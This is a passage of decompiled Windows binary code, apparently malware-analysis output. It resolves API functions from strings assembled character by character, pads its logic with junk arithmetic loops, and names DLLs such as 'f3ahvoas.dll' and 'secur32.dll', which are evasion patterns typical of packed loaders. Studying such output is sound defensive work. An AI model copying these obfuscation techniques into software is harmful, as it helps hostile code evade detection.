					_push(_v1016);
					E0040A3C0(0);
					_push(_v1020);
					E0040A3C0(0);
					_push(_v1024);
					E0040A3C0(0);
					_push(_v1028);
					E0040A3C0(0);
					_push(_v1032);
					E0040A3C0(0);
					_push(_v1036);
					E0040A3C0(0);
					_push(_v1040);
					E0040A3C0(0);
					_push(_v1044);
					E0040A494( &_v996, _t3910, 0xc, _t5187, _t5188);
					 *0x8b11e8 = GetProcAddress(_v8, E0040A594(_v996));
					_t2632 =  *0x8a9f40; // 0x8b0925
					_v103 =  *_t2632;
					if(_v103 + 0x9f - 0x1a < 0) {
						_v103 = _v103 - 0x20;
					}
					_t2637 =  *0x8a9f40; // 0x8b0925
					_v104 =  *_t2637;
					if(_v104 + 0x9f - 0x1a < 0) {
						_v104 = _v104 - 0x20;
					}
					_t2642 =  *0x8aa0b4; // 0x8b091f
					_v105 =  *_t2642;
					if(_v105 + 0x9f - 0x1a < 0) {
						_v105 = _v105 - 0x20;
					}
					E0040A3C0(0);
					_push(_v1052);
					E0040A3C0(0);
					_push(_v1056);
					E0040A3C0(0);
					_push(_v1060);
					E0040A3C0(0);
					_push(_v1064);
					E0040A3C0(0);
					_push(_v1068);
					E0040A3C0(0);
					_push(_v1072);
					E0040A3C0(0);
					_push(_v1076);
					E0040A3C0(0);
					_push(_v1080);
					E0040A3C0(0);
					_push(_v1084);
					E0040A3C0(0);
					_push(_v1088);
					E0040A3C0(0);
					_push(_v1092);
					E0040A3C0(0);
					_push(_v1096);
					E0040A3C0(0);
					_push(_v1100);
					E0040A3C0(0);
					_push(_v1104);
					E0040A3C0(0);
					_push(_v1108);
					E0040A494( &_v1048, _t3910, 0xf, _t5187, _t5188);
					 *0x8b124c = GetProcAddress(_v8, E0040A594(_v1048));
					_v52 = _v60 + 0x68;
					E0040A0C0( &_v12, _v16);
					_t2687 =  *0x8a99d4; // 0x0
					_v112 = _t2687;
					if(_v112 != 0) {
						_v112 =  *((intOrPtr*)(_v112 - 4));
					}
					if(_v112 == 0xea) {
						if(0x78 - _v60 < 0x20) {
							_v68 = _v56 + 0xea;
							asm("fild dword [ebp-0x14]");
							_v76 = E004076E8();
							E0040ACEC(_v12, 0, 1,  &_v12);
							_v44 = _v64 + 0x9a;
							E0040A0C0( &_v16, _v12);
							E0040ACEC(_v12, 0, 1,  &_v12);
						}
						_t5280 = _v64 + 0x25 - _v72;
						if(_v64 + 0x25 >= _v72) {
							__eflags = 0;
							E0040ACEC(_v12, 0, 1,  &_v16);
							_t3420 =  &_v412;
							_t4908 =  *0x8a9f40; // 0x8b0925
							 *((char*)(_t3420 + 1)) =  *_t4908;
							 *_t3420 = 1;
							E0040A324( &_v416,  &_v412);
							_t3423 =  &_v420;
							_t4911 =  *0x8a9ffc; // 0x8b091a
							 *((char*)(_t3423 + 1)) =  *_t4911;
							 *_t3423 = 1;
							E0040A34C( &_v416, 2,  &_v420);
							E0040A324( &_v424,  &_v416);
							_t3428 =  &_v420;
							_t4915 =  *0x8a9f40; // 0x8b0925
							 *((char*)(_t3428 + 1)) =  *_t4915;
							 *_t3428 = 1;
							E0040A34C( &_v424, 3,  &_v420);
							E0040A324( &_v432,  &_v424);
							_t3433 =  &_v420;
							_t4919 =  *0x8aa0b4; // 0x8b091f
							 *((char*)(_t3433 + 1)) =  *_t4919;
							 *_t3433 = 1;
							E0040A34C( &_v432, 4,  &_v420);
							E0040A324( &_v440,  &_v432);
							_t3438 =  &_v420;
							_t4923 =  *0x8a9e00; // 0x8b091d
							 *((char*)(_t3438 + 1)) =  *_t4923;
							 *_t3438 = 1;
							E0040A34C( &_v440, 5,  &_v420);
							E0040A324( &_v448,  &_v440);
							_t3443 =  &_v420;
							_t4927 =  *0x8a9fd0; // 0x8b0917
							 *((char*)(_t3443 + 1)) =  *_t4927;
							 *_t3443 = 1;
							E0040A34C( &_v448, 6,  &_v420);
							E0040A324( &_v456,  &_v448);
							_t3448 =  &_v420;
							_t4931 =  *0x8a9f14; // 0x8b0922
							 *((char*)(_t3448 + 1)) =  *_t4931;
							 *_t3448 = 1;
							E0040A34C( &_v456, 7,  &_v420);
							E0040A324( &_v468,  &_v456);
							_t3453 =  &_v420;
							_t4935 =  *0x8a9ce4; // 0x8b0912
							 *((char*)(_t3453 + 1)) =  *_t4935;
							 *_t3453 = 1;
							E0040A34C( &_v468, 8,  &_v420);
							E0040A324( &_v480,  &_v468);
							E0040A34C( &_v480, 9, 0x86f3d4);
							E0040A324( &_v492,  &_v480);
							_t3462 =  &_v420;
							_t4941 =  *0x8aa15c; // 0x8b091c
							 *((char*)(_t3462 + 1)) =  *_t4941;
							 *_t3462 = 1;
							E0040A34C( &_v492, 0xa,  &_v420);
							E0040A324( &_v504,  &_v492);
							_t3467 =  &_v420;
							_t4945 =  *0x8a9f14; // 0x8b0922
							 *((char*)(_t3467 + 1)) =  *_t4945;
							 *_t3467 = 1;
							E0040A34C( &_v504, 0xb,  &_v420);
							E0040A324( &_v520,  &_v504);
							_t3472 =  &_v420;
							_t4949 =  *0x8a9f14; // 0x8b0922
							 *((char*)(_t3472 + 1)) =  *_t4949;
							 *_t3472 = 1;
							E0040A34C( &_v520, 0xc,  &_v420);
							E0040AA98( &_v520);
							E0040A0C0( &_v12, _v16);
							E0040A0C0( &_v16, L"f3ahvoas.dll");
							E0040A0C0( &_v20, _v16);
							E0040A0C0( &_v20, _v20);
						} else {
							E0040A0C0( &_v20, _v12);
							E0040A0C0( &_v12, L"secur32.dll");
							E0040A0C0( &_v12, _v12);
							E0040A0C0( &_v16, _v20);
							_t3493 =  &_v412;
							_t4961 =  *0x8a9ffc; // 0x8b091a
							 *((char*)(_t3493 + 1)) =  *_t4961;
							 *_t3493 = 1;
							E0040A324( &_v416,  &_v412);
							_t3496 =  &_v420;
							_t4964 =  *0x8aa104; // 0x8b0919
							 *((char*)(_t3496 + 1)) =  *_t4964;
							 *_t3496 = 1;
							E0040A34C( &_v416, 2,  &_v420);
							E0040A324( &_v424,  &_v416);
							_t3501 =  &_v420;
							_t4968 =  *0x8a9fd0; // 0x8b0917
							 *((char*)(_t3501 + 1)) =  *_t4968;
							 *_t3501 = 1;
							E0040A34C( &_v424, 3,  &_v420);
							E0040A324( &_v432,  &_v424);
							E0040A34C( &_v432, 4, 0x86f590);
							E0040A324( &_v440,  &_v432);
							_t3510 =  &_v420;
							_t4974 =  *0x8a9fbc; // 0x8b0929
							 *((char*)(_t3510 + 1)) =  *_t4974;
							 *_t3510 = 1;
							E0040A34C( &_v440, 5,  &_v420);
							E0040A324( &_v448,  &_v440);
							_t3515 =  &_v420;
							_t4978 =  *0x8aa288; // 0x8b091b
							 *((char*)(_t3515 + 1)) =  *_t4978;
							 *_t3515 = 1;
							E0040A34C( &_v448, 6,  &_v420);
							E0040A324( &_v456,  &_v448);
							E0040A34C( &_v456, 7, 0x86f590);
							E0040A324( &_v468,  &_v456);
							_t3524 =  &_v420;
							_t4984 =  *0x8a9cf4; // 0x8b0911
							 *((char*)(_t3524 + 1)) =  *_t4984;
							 *_t3524 = 1;
							E0040A34C( &_v468, 8,  &_v420);
							E0040A324( &_v480,  &_v468);
							_t3529 =  &_v420;
							_t4988 =  *0x8a9fd0; // 0x8b0917
							 *((char*)(_t3529 + 1)) =  *_t4988;
							 *_t3529 = 1;
							E0040A34C( &_v480, 9,  &_v420);
							E0040A324( &_v492,  &_v480);
							_t3534 =  &_v420;
							_t4992 =  *0x8aa0b8; // 0x8b0928
							 *((char*)(_t3534 + 1)) =  *_t4992;
							 *_t3534 = 1;
							E0040A34C( &_v492, 0xa,  &_v420);
							E0040A324( &_v504,  &_v492);
							E0040A34C( &_v504, 0xb, 0x86f590);
							E0040A324( &_v520,  &_v504);
							_t3543 =  &_v420;
							_t4998 =  *0x8a9f40; // 0x8b0925
							 *((char*)(_t3543 + 1)) =  *_t4998;
							 *_t3543 = 1;
							E0040A34C( &_v520, 0xc,  &_v420);
							E0040A324( &_v1132,  &_v520);
							_t3548 =  &_v420;
							_t5002 =  *0x8a9c3c; // 0x8b0918
							 *((char*)(_t3548 + 1)) =  *_t5002;
							 *_t3548 = 1;
							E0040A34C( &_v1132, 0xd,  &_v420);
							E0040A324( &_v1148,  &_v1132);
							_t3553 =  &_v420;
							_t5006 =  *0x8a9d58; // 0x8b0913
							 *((char*)(_t3553 + 1)) =  *_t5006;
							 *_t3553 = 1;
							E0040A34C( &_v1148, 0xe,  &_v420);
							E0040A324( &_v1164,  &_v1148);
							_t3558 =  &_v420;
							_t5010 =  *0x8a9ce4; // 0x8b0912
							 *((char*)(_t3558 + 1)) =  *_t5010;
							 *_t3558 = 1;
							E0040A34C( &_v1164, 0xf,  &_v420);
							E0040A324( &_v1184,  &_v1164);
							E0040A34C( &_v1184, 0x10, 0x86f590);
							E0040A324( &_v1204,  &_v1184);
							_t3567 =  &_v420;
							_t5016 =  *0x8aa15c; // 0x8b091c
							 *((char*)(_t3567 + 1)) =  *_t5016;
							 *_t3567 = 1;
							E0040A34C( &_v1204, 0x11,  &_v420);
							E0040A324( &_v1224,  &_v1204);
							_t3572 =  &_v420;
							_t5020 =  *0x8a9ce4; // 0x8b0912
							 *((char*)(_t3572 + 1)) =  *_t5020;
							 *_t3572 = 1;
							E0040A34C( &_v1224, 0x12,  &_v420);
							E0040A324( &_v1244,  &_v1224);
							_t3577 =  &_v420;
							_t5024 =  *0x8a9f14; // 0x8b0922
							 *((char*)(_t3577 + 1)) =  *_t5024;
							 *_t3577 = 1;
							E0040A34C( &_v1244, 0x13,  &_v420);
							E0040A324( &_v1268,  &_v1244);
							_t3582 =  &_v420;
							_t5028 =  *0x8a9ffc; // 0x8b091a
							 *((char*)(_t3582 + 1)) =  *_t5028;
							 *_t3582 = 1;
							E0040A34C( &_v1268, 0x14,  &_v420);
							E0040A324( &_v1292,  &_v1268);
							_t3587 =  &_v420;
							_t5032 =  *0x8a9f8c; // 0x8b0915
							 *((char*)(_t3587 + 1)) =  *_t5032;
							 *_t3587 = 1;
							E0040A34C( &_v1292, 0x15,  &_v420);
							E0040A324( &_v1316,  &_v1292);
							_t3592 =  &_v420;
							_t5036 =  *0x8a9f14; // 0x8b0922
							 *((char*)(_t3592 + 1)) =  *_t5036;
							 *_t3592 = 1;
							E0040A34C( &_v1316, 0x16,  &_v420);
							E0040A324( &_v1340,  &_v1316);
							_t3597 =  &_v420;
							_t5040 =  *0x8a9c3c; // 0x8b0918
							 *((char*)(_t3597 + 1)) =  *_t5040;
							 *_t3597 = 1;
							E0040A34C( &_v1340, 0x17,  &_v420);
							E0040A324( &_v1368,  &_v1340);
							_t3602 =  &_v420;
							_t5044 =  *0x8a9ffc; // 0x8b091a
							 *((char*)(_t3602 + 1)) =  *_t5044;
							 *_t3602 = 1;
							E0040A34C( &_v1368, 0x18,  &_v420);
							E0040A324( &_v1396,  &_v1368);
							_t3607 =  &_v420;
							_t5048 =  *0x8aa15c; // 0x8b091c
							 *((char*)(_t3607 + 1)) =  *_t5048;
							 *_t3607 = 1;
							E0040A34C( &_v1396, 0x19,  &_v420);
							E0040A324( &_v1424,  &_v1396);
							E0040A34C( &_v1424, 0x1a, 0x86f590);
							E0040A324( &_v1452,  &_v1424);
							_t3616 =  &_v420;
							_t5054 =  *0x8a9f14; // 0x8b0922
							 *((char*)(_t3616 + 1)) =  *_t5054;
							 *_t3616 = 1;
							E0040A34C( &_v1452, 0x1b,  &_v420);
							E0040A444( &_v1116, 0,  &_v1452, _t5280);
							_push(_v1116);
							E006BA5A8(1,  &_v1456, _t5280);
							_push(_v1456);
							_push(0x86f5a0);
							E006BA5A8(1,  &_v1460, _t5280);
							_push(_v1460);
							_push(0x86f5a0);
							E006BA5A8(0,  &_v1464, _t5280);
							_push(_v1464);
							_push(0x86f534);
							E0040A3C0(0);
							_push(_v1468);
							E0040A3C0(0);
							_push(_v1472);
							E0040A3C0(0);
							E0040A494( &_v1112, _t3910, 0xa, _t5187, _t5188);
							E0040A9E8( &_v20, _v1112, _v1476);
							E0040A0C0( &_v16, L"systemcpl.dll");
						}
					}
					E0040A0C0( &_v12, _v16);
					E0040A0C0( &_v12, _v16);
					if(_v60 <= _v72) {
						E0040A0C0( &_v20, _v12);
					} else {
						E0040ACEC(_v20, 2, 1,  &_v12);
					}
					_t2695 =  *0x8a9f40; // 0x8b0925
					_v113 =  *_t2695;
					if(_v113 + 0x9f - 0x1a < 0) {
						_v113 = _v113 - 0x20;
					}
					_t2700 =  *0x8aa0b4; // 0x8b091f
					_v114 =  *_t2700;
					if(_v114 + 0x9f - 0x1a < 0) {
						_v114 = _v114 - 0x20;
					}
					_t2705 =  *0x8aa15c; // 0x8b091c
					_v115 =  *_t2705;
					if(_v115 + 0x9f - 0x1a < 0) {
						_v115 = _v115 - 0x20;
					}
					E0040A3C0(0);
					_push(_v1484);
					E0040A3C0(0);
					_push(_v1488);
					E0040A3C0(0);
					_push(_v1492);
					E0040A3C0(0);
					_push(_v1496);
					E0040A3C0(0);
					_push(_v1500);
					E0040A3C0(0);
					_push(_v1504);
					E0040A3C0(0);
					_push(_v1508);
					E0040A3C0(0);
					_push(_v1512);
					E0040A3C0(0);
					_push(_v1516);
					E0040A3C0(0);
					_push(_v1520);
					E0040A3C0(0);
					_push(_v1524);
					E0040A3C0(0);
					_push(_v1528);
					E0040A3C0(0);
					_push(_v1532);
					E0040A494( &_v1480, _t3910, 0xd, _t5187, _t5188);
					 *0x8b1250 = GetProcAddress(_v8, E0040A594(_v1480));
					_v64 = 0;
					while(_v64 < 7) {
						_v64 = _v64 + 1;
						_v424 = _v60 + 4;
						asm("fild dword [ebp-0x1a4]");
						_v52 = E004076F4();
						 *0x8a9b2c = 0;
						E0085E4BC();
						_v48 = 0;
						if(_v48 < 0xc) {
							_v48 = _v48 + 1;
							asm("fild dword [ebp-0x18]");
							_v76 = E004076F4();
							asm("fild dword [ebp-0x40]");
							_v32 = E004076F4();
							_t3404 =  *0x8a9b54; // 0xfcfc377e
							 *0x8a9adc = _t3404 *  *0x8a9aa0;
							asm("fild dword [0x8a9b3c]");
							 *0x8a9bbc = E004076F4();
							_t3407 =  *0x8a9b68; // 0x74d3d365
							 *0x8a9ab8 = _t3407;
							_t3408 =  *0x8a9b20; // 0xbfd15606
							 *0x8a9b58 = _t3408 -  *0x8a9b38;
						}
						if(0x4c - _v60 < 0xa2) {
							_t3392 =  *0x8a9b70; // 0x20ba273a
							 *0x8a9b94 = _t3392 - 0xdc;
							_t3394 =  *0x8a9b28; // 0xfbe6deff
							 *0x8a9aa4 = _t3394 *  *0x8a9b38;
							_t3396 =  *0x8a9b14; // 0xfbe6deb5
							 *0x8a9b84 = _t3396 *  *0x8a9b68;
							_t3398 =  *0x8a9bb4; // 0x60792cbd
							 *0x8a9abc = _t3398;
							_t3399 =  *0x8a9b28; // 0xfbe6deff
							 *0x8a9b68 = _t3399;
							_t3400 =  *0x8a9ac8; // 0x6009aad3
							 *0x8a9a74 = _t3400 -  *0x8a9a5c;
						}
					}
					 *0x8a9aa4 = 0x33 -  *0x8a9a40;
					_t2745 =  *0x8a9a6c; // 0xfbe7a61a
					 *0x8a9aa4 = _t2745;
					 *0x8a9b20 = 0;
					E0085E4BC();
					_t2748 =  *0x8a9a1c; // 0x0
					_v120 = _t2748;
					if(_v120 != 0) {
						_v120 =  *((intOrPtr*)(_v120 - 4));
					}
					if(_v120 != 7) {
						_t2749 =  *0x8a9b34; // 0xedbf3fa1
						_t4649 =  *0x8a9a6c; // 0xfbe7a61a
						__eflags = _t2749 +  *0x8a9b20 - _t4649 +  *0x8a9b34;
						if(_t2749 +  *0x8a9b20 < _t4649 +  *0x8a9b34) {
							_t3369 =  *0x8a9b80; // 0x60792cbd
							 *0x8a9a5c = _t3369 -  *0x8a9b34;
							_t3371 =  *0x8a9b68; // 0x74d3d365
							 *0x8a9b4c = _t3371 -  *0x8a9b68;
							asm("fild dword [0x8a9b18]");
							 *0x8a9aa0 = E004076F4();
							_t3374 =  *0x8a9b44; // 0x892c9cf8
							 *0x8a9b38 = _t3374;
							_t3375 =  *0x8a9b6c; // 0x6009aa4c
							 *0x8a9bbc = _t3375 - 0xc;
							_t3377 =  *0x8a9a50; // 0x3408bc9
							_t3378 = _t3377 - 9;
							__eflags = _t3378;
							 *0x8a9aa0 = _t3378;
						}
					} else {
						_t3379 =  *0x8a99e0; // 0x722ec333
						 *0x8a9b84 = _t3379 + 0x4c;
					}
					_t2751 =  *0x8a9ba0; // 0x6009aac0
					 *0x8a9b20 = _t2751 + 0x43;
					_t2753 =  *0x8a9f40; // 0x8b0925
					_v121 =  *_t2753;
					if(_v121 + 0x9f - 0x1a < 0) {
						_v121 = _v121 - 0x20;
					}
					_t2758 =  *0x8a9e34; // 0x8b091e
					_v122 =  *_t2758;
					if(_v122 + 0x9f - 0x1a < 0) {
						_v122 = _v122 - 0x20;
					}
					_t2763 =  *0x8aa0b4; // 0x8b091f
					_v123 =  *_t2763;
					if(_v123 + 0x9f - 0x1a < 0) {
						_v123 = _v123 - 0x20;
					}
					_t2768 =  *0x8aa104; // 0x8b0919
					_v124 =  *_t2768;
					if(_v124 + 0x9f - 0x1a < 0) {
						_v124 = _v124 - 0x20;
					}
					E0040A3C0(0);
					_push(_v1540);
					E0040A3C0(0);
					_push(_v1544);
					E0040A3C0(0);
					_push(_v1548);
					E0040A3C0(0);
					_push(_v1552);
					E0040A3C0(0);
					_push(_v1556);
					E0040A3C0(0);
					_push(_v1560);
					E0040A3C0(0);
					_push(_v1564);
					E0040A3C0(0);
					_push(_v1568);
					E0040A3C0(0);
					_push(_v1572);
					E0040A3C0(0);
					_push(_v1576);
					E0040A3C0(0);
					_push(_v1580);
					E0040A3C0(0);
					_push(_v1584);
					E0040A3C0(0);
					_push(_v1588);
					E0040A3C0(0);
					_push(_v1592);
					E0040A3C0(0);
					_push(_v1596);
					E0040A3C0(0);
					_push(_v1600);
					E0040A3C0(0);
					_push(_v1604);
					E0040A494( &_v1536, _t3910, 0x11, _t5187, _t5188);
					 *0x8b1258 = GetProcAddress(_v8, E0040A594(_v1536));
					_v64 = 0;
					if(_v64 < 9) {
						_v64 = _v64 + 1;
						_t3366 =  *0x8a9a5c; // 0x74d3d365
						 *0x8a9b24 = _t3366;
						_v52 = _v44 - 0x6c;
					}
					_t2814 =  *0x8a9b34; // 0xedbf3fa1
					_t5305 = _t2814 -  *0x8a9b4c; // 0x4d1a0eb9
					if(_t5305 > 0) {
						if(_v56 + _v60 != _v60) {
							asm("fild dword [0x8a9b6c]");
							 *0x8a9a58 = E004076E8();
							 *0x8a9b08 = 0xf1 -  *0x8a9b24;
							_t3329 =  *0x8a9b18; // 0x194
							 *0x8a9b94 = _t3329 *  *0x8a9b6c;
							_t3331 =  *0x8a9ab8; // 0xfcfc377e
							 *0x8a9aa4 = _t3331 +  *0x8a9a8c;
							_t3333 =  *0x8a9b2c; // 0x9a36d255
							 *0x8a9b70 = _t3333;
							_t3334 =  *0x8a9a38; // 0x438e1da9
							_t3335 = _t3334 + 0x45;
							__eflags = _t3335;
							 *0x8a9a9c = _t3335;
						} else {
							_v68 = _v36 + 0xa6;
							_v424 = _v24 + 4;
							asm("fild dword [ebp-0x1a4]");
							_v76 = E004076F4();
							_v32 = _v28 * 0xd7;
							_t3360 =  *0x8a9bc0; // 0x86ef288d
							 *0x8a9ae0 = _t3360 + 4;
							_t3362 =  *0x8a9ba0; // 0x6009aac0
							 *0x8a9bbc = _t3362 *  *0x8a9bb0;
							_t3364 =  *0x8a9a34; // 0xe22aa3e4
							 *0x8a9b08 = _t3364 +  *0x8a9b64;
						}
						_t3336 =  *0x8a9a5c; // 0x74d3d365
						 *0x8a9af0 = _t3336;
						_t3337 =  *0x8a9b78; // 0x12d6c
						 *0x8a9ba0 = _t3337;
						_t3338 =  *0x8a9a70; // 0x60792d03
						 *0x8a9a70 = E00407278(_t3338);
						_t3340 =  *0x8a9a70; // 0x60792d03
						_t5307 = _t3340 -  *0x8a9ba0; // 0x6009aac0
						if(_t5307 > 0) {
							_t3343 =  *0x8a9ad4; // 0xba811226
							 *0x8a9ba0 = _t3343 + 0xb;
							_t3345 =  *0x8a9b78; // 0x12d6c
							 *0x8a9ad8 = _t3345 - 6;
							asm("fild dword [0x8a9b38]");
							 *0x8a9b30 = E004076F4();
							_t3348 =  *0x8a9a88; // 0xb09b9fd8
							 *0x8a9ba4 = _t3348 *  *0x8a9ba4;
							_t3350 =  *0x8a9a8c; // 0x7acda9e0
							 *0x8a9a90 = _t3350 *  *0x8a9b38;
							_t3352 = E008A9B04; // 0xc1b26c1f
							 *0x8a9b5c = _t3352 - 0x2b;
						}
						E0040A0C0( &_v12, _v20);
					}
					_t2815 =  *0x8a9b50; // 0x36c714d5
					 *0x8a9b14 = _t2815;
					if(_v64 + _v56 != _v56) {
						_t2818 =  *0x8a9b08; // 0x722ec337
						_t2819 = _t2818 +  *0x8a9af4;
						__eflags = _t2819;
						 *0x8a9ba4 = _t2819;
					} else {
						asm("fild dword [0x8a9ad8]");
						 *0x8a9b38 = E004076E8();
					}
					_t2820 =  *0x8a9b34; // 0xedbf3fa1
					_v424 = _t2820 + 4;
					asm("fild dword [ebp-0x1a4]");
					 *0x8a9b4c = E004076F4();
					E0040A0C0( &_v12, _v16);
					_t2825 =  *0x8a9f40; // 0x8b0925
					_v125 =  *_t2825;
					if(_v125 + 0x9f - 0x1a < 0) {
						_v125 = _v125 - 0x20;
					}
					_t2830 =  *0x8aa15c; // 0x8b091c
					_v126 =  *_t2830;
					if(_v126 + 0x9f - 0x1a < 0) {
						_v126 = _v126 - 0x20;
					}
					_t2835 =  *0x8aa1dc; // 0x8b0921
					_v127 =  *_t2835;
					if(_v127 + 0x9f - 0x1a < 0) {
						_v127 = _v127 - 0x20;
					}
					E0040A3C0(0);
					_push(_v1612);
					E0040A3C0(0);
					_push(_v1616);
					E0040A3C0(0);
					_push(_v1620);
					E0040A3C0(0);
					_push(_v1624);
					E0040A3C0(0);
					_push(_v1628);
					E0040A3C0(0);
					_push(_v1632);
					E0040A3C0(0);
					_push(_v1636);
					E0040A3C0(0);
					_push(_v1640);
					E0040A3C0(0);
					_push(_v1644);
					E0040A3C0(0);
					_push(_v1648);
					E0040A3C0(0);
					_push(_v1652);
					E0040A3C0(0);
					_push(_v1656);
					E0040A3C0(0);
					_push(_v1660);
					E0040A3C0(0);
					_push(_v1664);
					E0040A494( &_v1608, _t3910, 0xe, _t5187, _t5188);
					 *0x8b1254 = GetProcAddress(_v8, E0040A594(_v1608));
					_v36 = 0;
					E0085E4BC();
					_t2876 =  *0x8a9a40; // 0xe6ca04f5
					 *0x8a9ac0 = _t2876;
					_v64 = 0;
					while(_v64 < 8) {
						_v64 = _v64 + 1;
						_v68 = 0;
						while(_v68 < 7) {
							_v68 = _v68 + 1;
							_v76 = _v60 * _v28;
							_v32 = _v48 * _v24;
							_v40 = _v56 - 0xf5;
							_t3318 =  *0x8a9a8c; // 0x7acda9e0
							 *0x8a9b20 = _t3318 +  *0x8a9b00;
							_t3320 =  *0x8a99e4; // 0x7c5162fc
							 *0x8a9bb4 = _t3320 - 0xe8;
							 *0x8a9ae4 =  *0x8a9af0 * 0xe3;
						}
					}
					E0040ACEC(_v20, 2, 1,  &_v12);
					 *0x8a9b60 = 0;
					E0085E4BC();
					 *0x8a9af4 = 0xb9 -  *0x8a9adc;
					_t2885 =  *0x8a9f40; // 0x8b0925
					_v128 =  *_t2885;
					if(_v128 + 0x9f - 0x1a < 0) {
						_v128 = _v128 - 0x20;
					}
					_t2890 =  *0x8aa15c; // 0x8b091c
					_v129 =  *_t2890;
					if(_v129 + 0x9f - 0x1a < 0) {
						_v129 = _v129 - 0x20;
					}
					_t2895 =  *0x8aa0b4; // 0x8b091f
					_v130 =  *_t2895;
					if(_v130 + 0x9f - 0x1a < 0) {
						_v130 = _v130 - 0x20;
					}
					E0040A3C0(0);
					_push(_v1672);
					E0040A3C0(0);
					_push(_v1676);
					E0040A3C0(0);
					_push(_v1680);
					E0040A3C0(0);
					_push(_v1684);
					E0040A3C0(0);
					_push(_v1688);
					E0040A3C0(0);
					_push(_v1692);
					E0040A3C0(0);
					_push(_v1696);
					E0040A3C0(0);
					_push(_v1700);
					E0040A3C0(0);
					_push(_v1704);
					E0040A3C0(0);
					_push(_v1708);
					E0040A3C0(0);
					_push(_v1712);
					E0040A3C0(0);
					_push(_v1716);
					E0040A3C0(0);
					_push(_v1720);
					E0040A3C0(0);
					_push(_v1724);
					E0040A3C0(0);
					_push(_v1728);
					E0040A3C0(0);
					_push(_v1732);
					E0040A494( &_v1668, _t3910, 0x10, _t5187, _t5188);
					 *0x8b125c = GetProcAddress(_v8, E0040A594(_v1668));
					_t2938 =  *0x8a9e34; // 0x8b091e
					_v131 =  *_t2938;
					if(_v131 + 0x9f - 0x1a < 0) {
						_v131 = _v131 - 0x20;
					}
					_t2943 =  *0x8a9f40; // 0x8b0925
					_v132 =  *_t2943;
					if(_v132 + 0x9f - 0x1a < 0) {
						_v132 = _v132 - 0x20;
					}
					_t2948 =  *0x8aa0b4; // 0x8b091f
					_v133 =  *_t2948;
					if(_v133 + 0x9f - 0x1a < 0) {
						_v133 = _v133 - 0x20;
					}
					_t2953 =  *0x8aa104; // 0x8b0919
					_v134 =  *_t2953;
					if(_v134 + 0x9f - 0x1a < 0) {
						_v134 = _v134 - 0x20;
					}
					_t2958 =  *0x8a9cf4; // 0x8b0911
					_v135 =  *_t2958;
					if(_v135 + 0x9f - 0x1a < 0) {
						_v135 = _v135 - 0x20;
					}
					E0040A3C0(0);
					_push(_v1740);
					E0040A3C0(0);
					_push(_v1744);
					E0040A3C0(0);
					_push(_v1748);
					E0040A3C0(0);
					_push(_v1752);
					E0040A3C0(0);
					_push(_v1756);
					E0040A3C0(0);
					_push(_v1760);
					E0040A3C0(0);
					_push(_v1764);
					E0040A3C0(0);
					_push(_v1768);
					E0040A3C0(0);
					_push(_v1772);
					E0040A3C0(0);
					_push(_v1776);
					E0040A3C0(0);
					_push(_v1780);
					E0040A3C0(0);
					_push(_v1784);
					E0040A3C0(0);
					_push(_v1788);
					E0040A3C0(0);
					_push(_v1792);
					E0040A3C0(0);
					_push(_v1796);
					E0040A3C0(0);
					_push(_v1800);
					E0040A3C0(0);
					_push(_v1804);
					E0040A3C0(0);
					_push(_v1808);
					E0040A3C0(0);
					_push(_v1812);
					E0040A3C0(0);
					_push(_v1816);
					E0040A494( &_v1736, _t3910, 0x14, _t5187, _t5188);
					 *0x8b1240 = GetProcAddress(_v8, E0040A594(_v1736));
					_v52 = _v48 + 4;
					_v64 = 0;
					if(_v64 >= 9) {
						L200:
						_t3012 =  *0x8a9e34; // 0x8b091e
						_v151 =  *_t3012;
						__eflags = _v151 + 0x9f - 0x1a;
						if(_v151 + 0x9f - 0x1a < 0) {
							_t1564 =  &_v151;
							 *_t1564 = _v151 - 0x20;
							__eflags =  *_t1564;
						}
						_t3017 =  *0x8aa080; // 0x8b0916
						_v152 =  *_t3017;
						__eflags = _v152 + 0x9f - 0x1a;
						if(_v152 + 0x9f - 0x1a < 0) {
							_t1568 =  &_v152;
							 *_t1568 = _v152 - 0x20;
							__eflags =  *_t1568;
						}
						_t3022 =  *0x8aa104; // 0x8b0919
						_v153 =  *_t3022;
						__eflags = _v153 + 0x9f - 0x1a;
						if(_v153 + 0x9f - 0x1a < 0) {
							_t1572 =  &_v153;
							 *_t1572 = _v153 - 0x20;
							__eflags =  *_t1572;
						}
						_t3027 =  *0x8aa080; // 0x8b0916
						_v154 =  *_t3027;
						__eflags = _v154 + 0x9f - 0x1a;
						if(_v154 + 0x9f - 0x1a < 0) {
							_t1576 =  &_v154;
							 *_t1576 = _v154 - 0x20;
							__eflags =  *_t1576;
						}
						_t3032 =  *0x8a9fd0; // 0x8b0917
						_v155 =  *_t3032;
						__eflags = _v155 + 0x9f - 0x1a;
						if(_v155 + 0x9f - 0x1a < 0) {
							_t1580 =  &_v155;
							 *_t1580 = _v155 - 0x20;
							__eflags =  *_t1580;
						}
						_t3037 =  *0x8a9f14; // 0x8b0922
						_v156 =  *_t3037;
						__eflags = _v156 + 0x9f - 0x1a;
						if(_v156 + 0x9f - 0x1a < 0) {
							_t1584 =  &_v156;
							 *_t1584 = _v156 - 0x20;
							__eflags =  *_t1584;
						}
						E0040A3C0(0);
						_push(_v1944);
						E0040A3C0(0);
						_push(_v1948);
						E0040A3C0(0);
						_push(_v1952);
						E0040A3C0(0);
						_push(_v1956);
						E0040A3C0(0);
						_push(_v1960);
						E0040A3C0(0);
						_push(_v1964);
						E0040A3C0(0);
						_push(_v1968);
						E0040A3C0(0);
						_push(_v1972);
						E0040A3C0(0);
						_push(_v1976);
						E0040A3C0(0);
						_push(_v1980);
						E0040A3C0(0);
						_push(_v1984);
						E0040A3C0(0);
						_push(_v1988);
						E0040A3C0(0);
						_push(_v1992);
						E0040A3C0(0);
						_push(_v1996);
						E0040A3C0(0);
						_push(_v2000);
						E0040A3C0(0);
						_push(_v2004);
						E0040A3C0(0);
						_push(_v2008);
						E0040A3C0(0);
						_push(_v2012);
						E0040A3C0(0);
						_push(_v2016);
						E0040A3C0(0);
						_push(_v2020);
						E0040A3C0(0);
						_push(_v2024);
						E0040A3C0(0);
						_push(_v2028);
						E0040A3C0(0);
						_push(_v2032);
						E0040A3C0(0);
						_push(_v2036);
						E0040A3C0(0);
						_push(_v2040);
						E0040A3C0(0);
						_push(_v2044);
						E0040A3C0(0);
						E0040A494( &_v1940, _t3910, 0x1b, _t5187, _t5188);
						E0040A9E8( &_v20, _v1940, _v2048);
						E0040A0C0( &_v12, _v20);
						E0040A0C0( &_v16, _v12);
						_push(_t5190);
						_push(0x862ccb);
						_push( *[fs:eax]);
